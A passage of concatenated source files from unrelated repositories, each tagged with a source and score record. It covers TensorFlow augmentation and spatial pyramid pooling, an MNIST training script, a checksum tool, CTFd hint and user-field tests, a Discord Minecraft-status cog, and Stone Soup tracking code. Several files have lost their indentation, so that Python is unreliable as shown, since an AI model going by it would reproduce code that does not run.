"must be > 0."])]
else:
return []
from skimage.transform import rotate as sk_rotate  # aliased so the wrapper below can reuse the name
from skimage.transform import warp
from skimage.transform import ProjectiveTransform
def rotate(X, intensity):
    for i in range(X.shape[0]):
        delta = 30. * intensity  # scale using augmentation intensity
        X[i] = sk_rotate(X[i], random.uniform(-delta, delta), mode='edge')
    return X
def apply_projection_transform(X, intensity):
image_size = X.shape[1]
d = image_size * 0.3 * intensity
for i in range(X.shape[0]):
tl_top = random.uniform(-d, d) # Top left corner, top margin
tl_left = random.uniform(-d, d) # Top left corner, left margin
bl_bottom = random.uniform(-d, d) # Bottom left corner, bottom margin
bl_left = random.uniform(-d, d) # Bottom left corner, left margin
tr_top = random.uniform(-d, d) # Top right corner, top margin
tr_right = random.uniform(-d, d) # Top right corner, right margin
br_bottom = random.uniform(-d, d) # Bottom right corner, bottom margin
br_right = random.uniform(-d, d) # Bottom right corner, right margin
transform = ProjectiveTransform()
transform.estimate(np.array((
(tl_left, tl_top),
(bl_left, image_size - bl_bottom),
(image_size - br_right, image_size - br_bottom),
(image_size - tr_right, tr_top)
)), np.array((
(0, 0),
(0, image_size),
(image_size, image_size),
(image_size, 0)
)))
X[i] = warp(X[i], transform, output_shape=(image_size, image_size), order = 1, mode = 'edge')
return X
```
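A short usage sketch for `augment` under TF 1.x (shapes and session setup are illustrative; note that `multiple` is unused by the currently active ops):
```python
import numpy as np
import tensorflow as tf

image = tf.placeholder(tf.float32, [224, 224, 3])
augmented = augment(image, multiple=32)  # only flips/contrast/brightness are active
with tf.Session() as sess:
    out = sess.run(augmented, feed_dict={image: np.zeros((224, 224, 3), np.float32)})
```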
#### File: scripts/functions/spp.py
```python
import tensorflow as tf
import numpy as np
def max_pool_2d_nxn_regions(inputs, output_size: int, mode: str):
"""
Performs a pooling operation that results in a fixed size:
output_size x output_size.
Used by spatial_pyramid_pool. Refer to appendix A in [1].
Args:
inputs: A 4D Tensor (B, H, W, C)
output_size: The output size of the pooling operation.
mode: The pooling mode {max, avg}
Returns:
A list of tensors, for each output bin.
The list contains output_size * output_size elements, where
        each element is a Tensor (N, C).
References:
[1] <NAME> et al (2015):
Spatial Pyramid Pooling in Deep Convolutional Networks
for Visual Recognition.
https://arxiv.org/pdf/1406.4729.pdf.
Ported from: https://github.com/luizgh/Lasagne/commit/c01e3d922a5712ca4c54617a15a794c23746ac8c
"""
inputs_shape = tf.shape(inputs)
h = tf.cast(tf.gather(inputs_shape, 1), tf.int32)
w = tf.cast(tf.gather(inputs_shape, 2), tf.int32)
if mode == 'max':
pooling_op = tf.reduce_max
elif mode == 'avg':
pooling_op = tf.reduce_mean
else:
msg = "Mode must be either 'max' or 'avg'. Got '{0}'"
raise ValueError(msg.format(mode))
result = []
n = output_size
for row in range(output_size):
for col in range(output_size):
# start_h = floor(row / n * h)
start_h = tf.cast(tf.floor(tf.multiply(tf.divide(row, n), tf.cast(h, tf.float32))), tf.int32)
# end_h = ceil((row + 1) / n * h)
end_h = tf.cast(tf.ceil(tf.multiply(tf.divide((row + 1), n), tf.cast(h, tf.float32))), tf.int32)
# start_w = floor(col / n * w)
start_w = tf.cast(tf.floor(tf.multiply(tf.divide(col, n), tf.cast(w, tf.float32))), tf.int32)
# end_w = ceil((col + 1) / n * w)
end_w = tf.cast(tf.ceil(tf.multiply(tf.divide((col + 1), n), tf.cast(w, tf.float32))), tf.int32)
pooling_region = inputs[:, start_h:end_h, start_w:end_w, :]
pool_result = pooling_op(pooling_region, axis=(1, 2))
result.append(pool_result)
return result
def spatial_pyramid_pool(inputs, dimensions=[2,1], mode='max', implementation='kaiming'):
"""
Performs spatial pyramid pooling (SPP) over the input.
It will turn a 2D input of arbitrary size into an output of fixed
    dimension.
    Hence, the convolutional part of a DNN can be connected to a dense part
with a fixed number of nodes even if the dimensions of the input
image are unknown.
The pooling is performed over :math:`l` pooling levels.
Each pooling level :math:`i` will create :math:`M_i` output features.
:math:`M_i` is given by :math:`n_i * n_i`, with :math:`n_i` as the number
of pooling operations per dimension level :math:`i`.
The length of the parameter dimensions is the level of the spatial pyramid.
Args:
inputs: A 4D Tensor (B, H, W, C).
dimensions: The list of :math:`n_i`'s that define the output dimension
of each pooling level :math:`i`. The length of dimensions is the level of
the spatial pyramid.
mode: Pooling mode 'max' or 'avg'.
        implementation: The implementation to use, either 'kaiming' or 'fast'.
        'kaiming' is the original implementation from the paper and supports
        variable input sizes, which 'fast' does not.
Returns:
A fixed length vector representing the inputs.
Notes:
        SPP should be inserted between the convolutional part of a DNN and its
        dense part. Convolutions can be used for arbitrary input dimensions, but
        the size of their output will depend on their input dimensions.
        Connecting the convolutional output to the dense part therefore
        usually forces us to fix the dimensions of the network's input.
The spatial pyramid pooling layer, however, allows us to leave
the network input dimensions arbitrary.
The advantage over a global pooling layer is the added robustness
against object deformations due to the pooling on different scales.
References:
[1] <NAME> et al (2015):
Spatial Pyramid Pooling in Deep Convolutional Networks
for Visual Recognition.
https://arxiv.org/pdf/1406.4729.pdf.
Ported from: https://github.com/luizgh/Lasagne/commit/c01e3d922a5712ca4c54617a15a794c23746ac8c
"""
pool_list = []
if implementation == 'kaiming':
for pool_dim in dimensions:
pool_list += max_pool_2d_nxn_regions(inputs, pool_dim, mode)
else:
shape = inputs.get_shape().as_list()
for d in dimensions:
h = shape[1]
w = shape[2]
ph = np.ceil(h * 1.0 / d).astype(np.int32)
pw = np.ceil(w * 1.0 / d).astype(np.int32)
sh = np.floor(h * 1.0 / d + 1).astype(np.int32)
sw = np.floor(w * 1.0 / d + 1).astype(np.int32)
pool_result = tf.nn.max_pool(inputs,
ksize=[1, ph, pw, 1],
strides=[1, sh, sw, 1],
padding='SAME')
pool_list.append(tf.reshape(pool_result, [tf.shape(inputs)[0], -1]))
    return tf.concat(pool_list, 1)  # axis 1: each entry is (B, features), giving one fixed-length vector per sample
```
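A usage sketch for `spatial_pyramid_pool` under TF 1.x (the placeholder shape is an illustrative assumption):
```python
import tensorflow as tf

# Spatial size may be unknown; only the channel count is fixed.
inputs = tf.placeholder(tf.float32, [None, None, None, 64])
# Levels [4, 2, 1] give 16 + 4 + 1 = 21 bins; with the 'kaiming' implementation each
# bin contributes a (B, 64) tensor, so the concatenated output is (B, 64 * 21).
spp = spatial_pyramid_pool(inputs, dimensions=[4, 2, 1], mode='max')
```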
#### File: tensorflow-layers-examples/scripts/train_squeezenet.py
```python
import sys, os
sys.path.append("./scripts/data_loader")
sys.path.append("./models")
from mnist_loader import load_data
from squeeze_net import squeeze_net
from preprocessor_example import mnist_batch_input_fn, minibatch_loader
import functools
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.estimators import model_fn as model_fn_lib
tf.logging.set_verbosity(tf.logging.INFO)
n_class = 10
# define model
def model_fn(features, labels, mode):
# you need to convert labels to one_hot for accuracy metrics.
# (input of accuracy metrics must be vector of scala labels.)
labels = tf.one_hot(labels, depth=n_class)
predictions, loss, train_op = squeeze_net(features, labels, mode, n_class)
# return
return model_fn_lib.ModelFnOps(
mode=mode, predictions=predictions, loss=loss, train_op=train_op)
def main(unused_argv):
# train_data, train_labels, eval_data, eval_labels = load_data("./data/mnist")
mnist = load_data("./data/mnist")
# create Estimator
run_config = tf.contrib.learn.RunConfig(save_summary_steps=10)
classifier = tf.contrib.learn.Estimator(
model_fn=model_fn, model_dir="./results/models/squeeze_net", config=run_config)
# setting log
tensors_to_log = {"probabilities": "softmax_tensor", "classes": "argmax_tensor"}
logging_hook = tf.train.LoggingTensorHook(
tensors=tensors_to_log, every_n_iter=50)
img_pointer_name = 'image_pointer'
label_file_name = 'labels'
data_root = './data'
img_pointer_path = os.path.join(data_root, img_pointer_name)
label_file_path = os.path.join(data_root, label_file_name)
# learning
classifier.fit(
# input_fn=lambda: mnist_batch_input_fn(mnist[:2]),
input_fn=lambda: minibatch_loader( \
img_pointer_path, label_file_path, data_root, \
n_class=10, batch_size=100, num_epochs=10),
monitors=[logging_hook]
)
metrics = {
"accuracy":
tf.contrib.learn.MetricSpec(
metric_fn=tf.metrics.accuracy, prediction_key="classes",
)
}
# evaluate
eval_results = classifier.evaluate(
# input_fn=lambda: mnist_batch_input_fn(mnist[2:]),
input_fn=lambda: minibatch_loader( \
img_pointer_path, label_file_path, data_root, \
n_class=10, batch_size=1, num_epochs=1),
metrics=metrics
)
print(eval_results)
if __name__ == "__main__":
tf.app.run()
``` |
{
"source": "0sifr/comparachecksum",
"score": 3
} |
#### File: comparachecksum/codebase/sha256.py
```python
import hashlib
import sys
def sha256_checksum(filename, block_size=65536):
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
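        # two-argument iter(): call f.read(block_size) repeatedly until it returns
        # the sentinel b'' (EOF), hashing the file in 64 KiB chunks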
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
def main():
for f in sys.argv[1:]:
checksum = sha256_checksum(f)
print(f + '\t' + checksum)
if __name__ == '__main__':
main()
``` |
{
"source": "0skAr-alws/CTFd",
"score": 2
} |
#### File: tests/teams/test_hints.py
```python
from CTFd.utils.scores import get_standings
from tests.helpers import (
create_ctfd,
destroy_ctfd,
gen_award,
gen_challenge,
gen_hint,
gen_team,
gen_user,
login_as_user,
)
def test_hint_team_unlock():
"""Is a user's unlocked hint reflected on other team members"""
app = create_ctfd(user_mode="teams")
with app.app_context():
user = gen_user(app.db)
second_user = gen_user(app.db, name="user", email="<EMAIL>")
team = gen_team(app.db)
user.team_id = team.id
second_user.team_id = team.id
team.members.append(user)
team.members.append(second_user)
chal = gen_challenge(app.db)
gen_hint(app.db, chal.id, content="hint", cost=1, type="standard")
        # Give the points to the user that doesn't unlock.
        # Users that unlock hints can still unlock, but the cost comes out of the team's points
gen_award(app.db, user_id=3, team_id=team.id)
app.db.session.commit()
with login_as_user(app, name="user_name") as client:
# Assert that we don't see a hint
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content") is None
# Unlock the hint
client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
# Assert that we see a hint
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content")
with login_as_user(app) as second_client:
# Assert that we see a hint
r = second_client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content")
# Assert that we can't double unlock
r = second_client.post(
"/api/v1/unlocks", json={"target": 1, "type": "hints"}
)
assert r.status_code == 400
assert (
r.get_json()["errors"]["target"]
== "You've already unlocked this this target"
)
# Assert that we see a hint
r = second_client.get("/api/v1/hints/1")
assert r.json["data"]["content"] == "hint"
# Verify standings
# We start with 100 points from the award.
# We lose a point because we unlock successfully once
standings = get_standings()
assert standings[0][2] == "team_name"
assert standings[0][3] == 99
destroy_ctfd(app)
def test_hint_team_unlocking_without_points():
"""Test that teams cannot enter negative point valuations from unlocking hints"""
app = create_ctfd(user_mode="teams")
with app.app_context():
user = gen_user(app.db)
second_user = gen_user(app.db, name="user", email="<EMAIL>")
team = gen_team(app.db)
user.team_id = team.id
second_user.team_id = team.id
team.members.append(user)
team.members.append(second_user)
chal = gen_challenge(app.db)
gen_hint(app.db, chal.id, content="hint", cost=1, type="standard")
app.db.session.commit()
with login_as_user(app, name="user_name") as client:
# Assert that we don't see a hint
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content") is None
# Attempt to unlock the hint
r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
assert r.status_code == 400
assert (
r.get_json()["errors"]["score"]
== "You do not have enough points to unlock this hint"
)
destroy_ctfd(app)
def test_teams_dont_prevent_other_teams_from_unlocking_hints():
"""Unlocks from one user don't affect other users"""
app = create_ctfd(user_mode="teams")
with app.app_context():
chal = gen_challenge(app.db)
gen_hint(app.db, chal.id, content="This is a hint", cost=1, type="standard")
team1 = gen_team(app.db, name="team1", email="<EMAIL>")
team2 = gen_team(app.db, name="team2", email="<EMAIL>")
# Give users points with an award
gen_award(app.db, user_id=team1.captain_id)
gen_award(app.db, user_id=team2.captain_id)
captain1 = team1.captain.name
captain2 = team2.captain.name
app.db.session.commit()
# First team unlocks hint
with login_as_user(app, name=captain1) as client:
r = client.get("/api/v1/hints/1")
assert r.status_code == 200
r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
assert r.status_code == 200
r = client.get("/api/v1/hints/1")
assert r.status_code == 200
# Second team unlocks hint
with login_as_user(app, name=captain2) as client:
r = client.get("/api/v1/hints/1")
assert r.status_code == 200
r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
assert r.status_code == 200
r = client.get("/api/v1/hints/1")
assert r.status_code == 200
destroy_ctfd(app)
```
#### File: tests/users/test_fields.py
```python
from CTFd.models import UserFieldEntries
from tests.helpers import (
create_ctfd,
destroy_ctfd,
gen_field,
login_as_user,
register_user,
)
def test_new_fields_show_on_pages():
app = create_ctfd()
with app.app_context():
register_user(app)
gen_field(app.db)
with app.test_client() as client:
r = client.get("/register")
assert "CustomField" in r.get_data(as_text=True)
assert "CustomFieldDescription" in r.get_data(as_text=True)
with login_as_user(app) as client:
r = client.get("/settings")
assert "CustomField" in r.get_data(as_text=True)
assert "CustomFieldDescription" in r.get_data(as_text=True)
r = client.patch(
"/api/v1/users/me",
json={"fields": [{"field_id": 1, "value": "CustomFieldEntry"}]},
)
resp = r.get_json()
assert resp["success"] is True
assert resp["data"]["fields"][0]["value"] == "CustomFieldEntry"
assert resp["data"]["fields"][0]["description"] == "CustomFieldDescription"
assert resp["data"]["fields"][0]["name"] == "CustomField"
assert resp["data"]["fields"][0]["field_id"] == 1
r = client.get("/user")
resp = r.get_data(as_text=True)
assert "CustomField" in resp
assert "CustomFieldEntry" in resp
r = client.get("/users/2")
resp = r.get_data(as_text=True)
assert "CustomField" in resp
assert "CustomFieldEntry" in resp
destroy_ctfd(app)
def test_fields_required_on_register():
app = create_ctfd()
with app.app_context():
gen_field(app.db)
with app.app_context():
with app.test_client() as client:
client.get("/register")
with client.session_transaction() as sess:
data = {
"name": "user",
"email": "<EMAIL>",
"password": "password",
"nonce": sess.get("nonce"),
}
client.post("/register", data=data)
with client.session_transaction() as sess:
assert sess.get("id") is None
with client.session_transaction() as sess:
data = {
"name": "user",
"email": "<EMAIL>",
"password": "password",
"fields[1]": "custom_field_value",
"nonce": sess.get("nonce"),
}
client.post("/register", data=data)
with client.session_transaction() as sess:
assert sess["id"]
destroy_ctfd(app)
def test_fields_properties():
app = create_ctfd()
with app.app_context():
register_user(app)
gen_field(
app.db, name="CustomField1", required=True, public=True, editable=True
)
gen_field(
app.db, name="CustomField2", required=False, public=True, editable=True
)
gen_field(
app.db, name="CustomField3", required=False, public=False, editable=True
)
gen_field(
app.db, name="CustomField4", required=False, public=False, editable=False
)
with app.test_client() as client:
r = client.get("/register")
resp = r.get_data(as_text=True)
assert "CustomField1" in resp
assert "CustomField2" in resp
assert "CustomField3" in resp
assert "CustomField4" in resp
with login_as_user(app) as client:
r = client.get("/settings")
resp = r.get_data(as_text=True)
assert "CustomField1" in resp
assert "CustomField2" in resp
assert "CustomField3" in resp
assert "CustomField4" not in resp
r = client.patch(
"/api/v1/users/me",
json={
"fields": [
{"field_id": 1, "value": "CustomFieldEntry1"},
{"field_id": 2, "value": "CustomFieldEntry2"},
{"field_id": 3, "value": "CustomFieldEntry3"},
{"field_id": 4, "value": "CustomFieldEntry4"},
]
},
)
resp = r.get_json()
assert resp == {
"success": False,
"errors": {"fields": ["Field 'CustomField4' cannot be editted"]},
}
r = client.patch(
"/api/v1/users/me",
json={
"fields": [
{"field_id": 1, "value": "CustomFieldEntry1"},
{"field_id": 2, "value": "CustomFieldEntry2"},
{"field_id": 3, "value": "CustomFieldEntry3"},
]
},
)
assert r.status_code == 200
r = client.get("/user")
resp = r.get_data(as_text=True)
assert "CustomField1" in resp
assert "CustomField2" in resp
assert "CustomField3" not in resp
assert "CustomField4" not in resp
r = client.get("/users/2")
resp = r.get_data(as_text=True)
assert "CustomField1" in resp
assert "CustomField2" in resp
assert "CustomField3" not in resp
assert "CustomField4" not in resp
destroy_ctfd(app)
def test_boolean_checkbox_field():
app = create_ctfd()
with app.app_context():
gen_field(app.db, name="CustomField1", field_type="boolean", required=False)
with app.test_client() as client:
r = client.get("/register")
resp = r.get_data(as_text=True)
# We should have rendered a checkbox input
assert "checkbox" in resp
with client.session_transaction() as sess:
data = {
"name": "user",
"email": "<EMAIL>",
"password": "password",
"nonce": sess.get("nonce"),
"fields[1]": "y",
}
client.post("/register", data=data)
with client.session_transaction() as sess:
assert sess["id"]
assert UserFieldEntries.query.count() == 1
assert UserFieldEntries.query.filter_by(id=1).first().value is True
with login_as_user(app) as client:
r = client.get("/settings")
resp = r.get_data(as_text=True)
assert "CustomField1" in resp
assert "checkbox" in resp
r = client.patch(
"/api/v1/users/me", json={"fields": [{"field_id": 1, "value": False}]}
)
assert r.status_code == 200
assert UserFieldEntries.query.count() == 1
assert UserFieldEntries.query.filter_by(id=1).first().value is False
destroy_ctfd(app)
``` |
{
"source": "0skis/bot",
"score": 3
} |
#### File: bot/cogs/minecraft.py
```python
from discord.ext import commands
from mcstatus import MinecraftServer
class Minecraft(commands.Cog):
def __init__(self, bot):
self.bot = bot
    @commands.command(name='minecraft', aliases=['ping'], help='Check whether a server is up and whether any fellow gamer is online')
async def _minecraft(self, ctx, *, msg: str):
for ip in msg.split():
if ':' in ip:
address = ip
else:
address = f'{ip}:25565'
try:
server = MinecraftServer.lookup(address)
status = server.status()
await ctx.send(f'{address} has {status.players.online} players and replied in {status.latency} ms')
            except Exception:  # lookup()/status() raise if the host is unreachable
await ctx.send(f'{address} is offline')
def setup(bot):
bot.add_cog(Minecraft(bot))
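# Loaded from the main bot module via bot.load_extension("cogs.minecraft")
# (extension path assumed from this file's location in the repo)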
``` |
{
"source": "0sm1um/Stone-Soup",
"score": 2
} |
#### File: hypothesiser/tests/test_composite.py
```python
import datetime
import numpy as np
import pytest
from ..categorical import HMMHypothesiser
from ..composite import CompositeHypothesiser
from ..probability import PDAHypothesiser
from ...models.measurement.categorical import MarkovianMeasurementModel
from ...predictor.composite import CompositePredictor
from ...types.detection import Detection, MissedDetection, CompositeDetection, CategoricalDetection
from ...types.hypothesis import CompositeHypothesis, CompositeProbabilityHypothesis
from ...types.multihypothesis import MultipleHypothesis
from ...types.state import GaussianState, CompositeState, CategoricalState
from ...types.track import Track
def make_categorical_measurement_model(ndim_state, ndim_meas):
E = np.random.rand(ndim_state, ndim_meas)
model = MarkovianMeasurementModel(emission_matrix=E)
return model
def test_composite(predictor, updater, dummy_category_predictor, dummy_category_updater):
sub_hypothesisers = [
PDAHypothesiser(predictor, updater, clutter_spatial_density=1.2e-2, prob_detect=0.9,
prob_gate=0.99),
HMMHypothesiser(dummy_category_predictor, dummy_category_updater,
prob_detect=0.7, prob_gate=0.95),
PDAHypothesiser(predictor, updater, clutter_spatial_density=1.4e-2, prob_detect=0.5,
prob_gate=0.98),
HMMHypothesiser(dummy_category_predictor, dummy_category_updater,
prob_detect=0.8, prob_gate=0.97)
]
# Test instantiation errors
with pytest.raises(ValueError, match="Cannot create an empty composite hypothesiser"):
CompositeHypothesiser(sub_hypothesisers=list())
with pytest.raises(ValueError, match="All sub-hypothesisers must be a hypothesiser type"):
CompositeHypothesiser(sub_hypothesisers + [1, 2, 3])
hypothesiser = CompositeHypothesiser(sub_hypothesisers=sub_hypothesisers)
# Test composite predictor and updater
expected_predictors = [sub_hyp.predictor for sub_hyp in sub_hypothesisers]
assert isinstance(hypothesiser.predictor, CompositePredictor)
assert hypothesiser.predictor.sub_predictors == expected_predictors
then = datetime.datetime.now()
now = then + datetime.timedelta(seconds=5)
track = Track([CompositeState([GaussianState([0, 1, 0, 1], 0.1 * np.eye(4)),
CategoricalState([0.2, 0.2, 0.2, 0.2, 0.2]),
GaussianState([3, 4, 5], 0.2 * np.eye(3)),
CategoricalState([0.3, 0.4, 0.3])],
default_timestamp=then)])
detection1 = CompositeDetection([Detection([3, 3, 3, 3], timestamp=now),
CategoricalDetection(np.random.rand(2), timestamp=now),
Detection([2, 4, 6], timestamp=now),
CategoricalDetection(np.random.rand(2), timestamp=now)],
mapping=[0, 1, 2, 3])
detection2 = CompositeDetection([Detection([4, 4, 4, 4], timestamp=now),
CategoricalDetection(np.random.rand(2), timestamp=now),
CategoricalDetection(np.random.rand(2), timestamp=now)],
mapping=[0, 1, 3])
detection3 = CompositeDetection([CategoricalDetection(np.random.rand(2), timestamp=now),
CategoricalDetection(np.random.rand(2), timestamp=now)],
mapping=[3, 1])
detections = {detection1, detection2, detection3}
multi_hypothesis = hypothesiser.hypothesise(track, detections, now)
# Test all hypotheses are composite
assert all({isinstance(hypothesis, CompositeHypothesis) for hypothesis in multi_hypothesis})
# Test all detections considered
hyp_detections = {hypothesis.measurement for hypothesis in multi_hypothesis}
for detection in detections:
assert detection in hyp_detections
# Test hypothesis for every detection
assert len(multi_hypothesis) == len(detections) + 1
# Test detections completely present in corresponding hypotheses
for detection in detections:
det_hyp = None
count = 0
for hyp in multi_hypothesis:
if hyp.measurement == detection:
det_hyp = hyp
count += 1
assert det_hyp is not None
assert count == 1
assert isinstance(det_hyp, CompositeProbabilityHypothesis)
# test mapping correct
for i, sub_det_hyp in enumerate(det_hyp):
try:
mapping_index = detection.mapping.index(i)
except ValueError:
assert isinstance(sub_det_hyp.measurement, MissedDetection)
else:
assert sub_det_hyp.measurement == detection[mapping_index]
# Test normalised
assert pytest.approx(sum({hyp.probability for hyp in multi_hypothesis})) == 1
sub_hyps_prob_sum = 0
for hyp in multi_hypothesis:
prod = 1
for sub_hyp in hyp:
prod *= sub_hyp.probability
sub_hyps_prob_sum += prod
# Test no detections
empty_hypotheses = hypothesiser.hypothesise(track, set(), now)
assert isinstance(empty_hypotheses, MultipleHypothesis)
assert len(empty_hypotheses) == 1
null_hyp = next(iter(empty_hypotheses))
assert not null_hyp
# Test contains
for sub_hypothesiser in sub_hypothesisers:
assert sub_hypothesiser in hypothesiser
assert PDAHypothesiser(predictor, updater, clutter_spatial_density=1, prob_detect=1,
prob_gate=1) not in hypothesiser
assert 'a' not in hypothesiser
# Test get
for i, expected_hypothesiser in enumerate(sub_hypothesisers):
assert hypothesiser[i] == expected_hypothesiser
# Test get slice
hypothesiser_slice = hypothesiser[1:]
assert isinstance(hypothesiser_slice, CompositeHypothesiser)
assert hypothesiser_slice.sub_hypothesisers == sub_hypothesisers[1:]
# Test iter
for i, exp_sub_hypothesiser in enumerate(hypothesiser):
assert exp_sub_hypothesiser == sub_hypothesisers[i]
# Test len
assert len(hypothesiser) == 4
```
#### File: measurement/tests/test_categorical.py
```python
import numpy as np
import pytest
from ....models.measurement.categorical import MarkovianMeasurementModel
from ....types.array import StateVector
from ....types.state import CategoricalState
def test_categorical_measurement_model():
# 3 hidden categories, 4 measurement categories
E = np.array([[30, 25, 5],
[20, 25, 10],
[10, 25, 80],
[40, 25, 5]])
# Test mismatched number of category names
with pytest.raises(ValueError, match="ndim_meas of 4 does not match number of measurement "
"categories 2"):
MarkovianMeasurementModel(E, measurement_categories=['red', 'blue'])
model = MarkovianMeasurementModel(E)
# Test default category names
assert model.measurement_categories == ['0', '1', '2', '3']
# Test normalised
expected_array = np.array([[3 / 10, 1 / 4, 1 / 20],
[2 / 10, 1 / 4, 2 / 20],
[1 / 10, 1 / 4, 16 / 20],
[4 / 10, 1 / 4, 1 / 20]])
assert np.allclose(model.emission_matrix, expected_array)
# Test ndim
assert model.ndim_state == 3
assert model.ndim_meas == 4
state = CategoricalState([80, 10, 10])
# Test function
new_vector = model.function(state, noise=False)
assert isinstance(new_vector, StateVector)
assert new_vector.shape[0] == 4
assert np.isclose(np.sum(new_vector), 1)
# Test mapping
assert np.array_equal(model.mapping, [0, 1, 2])
```
#### File: transition/tests/test_categorical.py
```python
from datetime import datetime, timedelta
import numpy as np
from ..categorical import MarkovianTransitionModel
from ....types.array import StateVector
from ....types.state import CategoricalState
def test_categorical_transition_model():
# 3 categories
F = np.array([[50, 5, 30],
[25, 90, 30],
[25, 5, 30]])
model = MarkovianTransitionModel(F)
# Test normalised
expected_array = np.array([[2 / 4, 1 / 20, 1 / 3],
[1 / 4, 18 / 20, 1 / 3],
[1 / 4, 1 / 20, 1 / 3]])
assert np.allclose(model.transition_matrix, expected_array)
# Test ndim
assert model.ndim == 3
assert model.ndim_state == 3
state = CategoricalState([80, 10, 10], timestamp=datetime.now())
# Test function (noiseless)
new_vector = model.function(state, time_interval=timedelta(seconds=1), noise=False)
assert isinstance(new_vector, StateVector)
assert new_vector.shape[0] == 3
assert np.isclose(np.sum(new_vector), 1)
# Test function (noisy)
new_vector = model.function(state, time_interval=timedelta(seconds=1), noise=True)
assert isinstance(new_vector, StateVector)
assert new_vector.shape[0] == 3
assert np.count_nonzero(new_vector) == 1 # basis vector
# Test 0 time-interval function
new_vector = model.function(state, time_interval=timedelta(seconds=0))
assert np.allclose(new_vector, state.state_vector)
# Test no time-interval
new_vector = model.function(state)
assert np.allclose(new_vector, state.state_vector)
```
#### File: stonesoup/predictor/categorical.py
```python
from ..base import Property
from ..models.transition.categorical import MarkovianTransitionModel
from ..predictor import Predictor
from ..predictor._utils import predict_lru_cache
from ..types.prediction import Prediction
class HMMPredictor(Predictor):
r"""Hidden Markov model predictor
Assumes transition model is time-invariant, and therefore care should be taken when predicting
forward to the same time."""
transition_model: MarkovianTransitionModel = Property(
doc="The transition model used to predict states forward in `time`."
)
@predict_lru_cache()
def predict(self, prior, timestamp=None, **kwargs):
r"""Predicts a :class:`~.CategoricalState` forward using the :attr:`transition_model`.
Parameters
----------
prior : :class:`~.CategoricalState`
:math:`\alpha_{t-1}`
timestamp : :class:`datetime.datetime`, optional
:math:`t`
**kwargs :
These are passed to the :meth:`transition_model.function` method.
Returns
-------
: :class:`~.CategoricalStatePrediction`
The predicted state.
Notes
-----
The Markovian transition model is time-invariant and the evaluated `time_interval` can be
`None`.
"""
predict_over_interval = self._predict_over_interval(prior, timestamp)
prediction_vector = self.transition_model.function(prior,
time_interval=predict_over_interval,
**kwargs)
return Prediction.from_state(prior, prediction_vector, timestamp=timestamp,
transition_model=self.transition_model)
def _predict_over_interval(self, prior, timestamp):
"""Private method to get the prediction interval (or None)
Parameters
----------
prior : :class:`~.State`
The prior state
timestamp : :class:`datetime.datetime`, optional
The (current) timestamp
Returns
-------
: :class:`datetime.timedelta`
time interval to predict over
"""
# Deal with undefined timestamps
if timestamp is None or prior.timestamp is None:
predict_over_interval = None
else:
predict_over_interval = timestamp - prior.timestamp
return predict_over_interval
```
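A minimal usage sketch, put together from the transition-model test above (import paths follow the repository layout):
```python
import datetime
import numpy as np
from stonesoup.models.transition.categorical import MarkovianTransitionModel
from stonesoup.predictor.categorical import HMMPredictor
from stonesoup.types.state import CategoricalState

F = np.array([[50, 5, 30],
              [25, 90, 30],
              [25, 5, 30]])
predictor = HMMPredictor(transition_model=MarkovianTransitionModel(F))
prior = CategoricalState([80, 10, 10], timestamp=datetime.datetime.now())
prediction = predictor.predict(
    prior, timestamp=prior.timestamp + datetime.timedelta(seconds=1))
```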
#### File: stonesoup/predictor/particle.py
```python
from .base import Predictor
from ._utils import predict_lru_cache
from .kalman import KalmanPredictor, ExtendedKalmanPredictor
from ..base import Property
from ..types.prediction import Prediction
from ..types.state import GaussianState
class ParticlePredictor(Predictor):
"""ParticlePredictor class
An implementation of a Particle Filter predictor.
"""
@predict_lru_cache()
def predict(self, prior, control_input=None, timestamp=None, **kwargs):
"""Particle Filter prediction step
Parameters
----------
prior : :class:`~.ParticleState`
A prior state object
control_input : :class:`~.State`, optional
The control input. It will only have an effect if
:attr:`control_model` is not `None` (the default is `None`)
timestamp: :class:`datetime.datetime`, optional
A timestamp signifying when the prediction is performed
(the default is `None`)
Returns
-------
: :class:`~.ParticleStatePrediction`
The predicted state
"""
# Compute time_interval
try:
time_interval = timestamp - prior.timestamp
except TypeError:
# TypeError: (timestamp or prior.timestamp) is None
time_interval = None
new_state_vector = self.transition_model.function(
prior,
noise=True,
time_interval=time_interval,
num_samples=len(prior),
**kwargs)
return Prediction.from_state(prior, state_vector=new_state_vector, weight=prior.weight,
timestamp=timestamp, particle_list=None,
transition_model=self.transition_model)
class ParticleFlowKalmanPredictor(ParticlePredictor):
"""Gromov Flow Parallel Kalman Particle Predictor
This is a wrapper around the :class:`~.GromovFlowParticlePredictor` which
can use a :class:`~.ExtendedKalmanPredictor` or
:class:`~.UnscentedKalmanPredictor` in parallel in order to maintain a
state covariance, as proposed in [1]_.
This should be used in conjunction with the
:class:`~.ParticleFlowKalmanUpdater`.
Parameters
----------
References
----------
.. [1] <NAME>, <NAME>., "Implementation of the Daum-Huang
Exact-Flow Particle Filter" 2012
"""
kalman_predictor: KalmanPredictor = Property(
default=None,
doc="Kalman predictor to use. Default `None` where a new instance of"
":class:`~.ExtendedKalmanPredictor` will be created utilising the"
"same transition model.")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.kalman_predictor is None:
self.kalman_predictor = ExtendedKalmanPredictor(
self.transition_model)
def predict(self, prior, *args, **kwargs):
particle_prediction = super().predict(prior, *args, **kwargs)
kalman_prediction = self.kalman_predictor.predict(
GaussianState(prior.state_vector, prior.covar, prior.timestamp),
*args, **kwargs)
return Prediction.from_state(prior, state_vector=particle_prediction.state_vector,
weight=particle_prediction.weight,
timestamp=particle_prediction.timestamp,
fixed_covar=kalman_prediction.covar, particle_list=None,
transition_model=self.transition_model)
```
#### File: sensor/action/__init__.py
```python
import datetime
from abc import abstractmethod
from typing import Iterator, Any
from ...base import Base, Property
class Action(Base):
"""The base class for an action that can be taken by a sensor or platform with an
:class:`~.ActionableProperty`."""
generator: Any = Property(default=None,
readonly=True,
doc="Action generator that created the action.")
end_time: datetime.datetime = Property(readonly=True,
doc="Time at which modification of the "
